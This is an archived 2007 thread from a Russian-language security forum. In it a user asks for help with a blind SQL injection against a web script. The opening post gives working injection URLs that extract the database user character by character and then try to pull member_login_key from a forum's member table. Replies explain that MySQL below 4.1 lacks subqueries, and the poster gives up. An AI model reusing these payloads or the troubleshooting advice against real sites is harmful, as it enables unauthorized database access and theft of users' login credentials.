ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
Blind SQL-Inj. Нужна помощь... |
14.10.2007, 20:55
|
|
Участник форума
Регистрация: 25.01.2006
Сообщений: 158
Провел на форуме:
1000724
Репутация:
361
|
|
Blind SQL-Inj. Нужна помощь...
Есть скрипт, подверженный Blind SQL-инъекции:
Код:
index.php?show=item&id=29+order+by+id'+and+ascii(lower(substring(user(),1,1)))>1/*
запрос успешно выполняется, все символы спокойно перебираются.
Если вместо user() поставить (select+member_login_key+from+ibf_members+where+id =2), чтоб было вот так:
Код:
index.php?show=item&id=29+order+by+id'+and+ascii(lower(substring((select+member_login_key+from+ibf_members+where+id=2),1,1)))>1/*
то выдается ошибка:
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'select member_login_key from ibf_members where id=2),1,1)))>1/*
Указанные поле и таблица точно существуют. Пробовал также варианты с aes_decrypt/aes_encrypt, char(), concat() - безрезультатно.
Кто-нить знает, почему выдается эта ошибка, и как это обойти? Запрос ведь верный вроде... |
|
|
14.10.2007, 21:14
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
версия mysql ниже 4.1 не поддерживает подзапросов
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
14.10.2007, 21:24
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Согласен с бр сначало надо пробить version()
|
|
|
|
14.10.2007, 22:02
|
|
Участник форума
Регистрация: 25.01.2006
Сообщений: 158
Провел на форуме:
1000724
Репутация:
361
|
|
Сообщение от blackybr
версия mysql ниже 4.1 не поддерживает подзапросов
Спасибо, не знал.
Версия 4.0.27-log 
По всей видимости придётся забить на эту дырку.
Всем спасибо.
|
|
|
|
15.10.2007, 21:52
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463
Репутация:
2258
|
|
Закрыто значит.
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
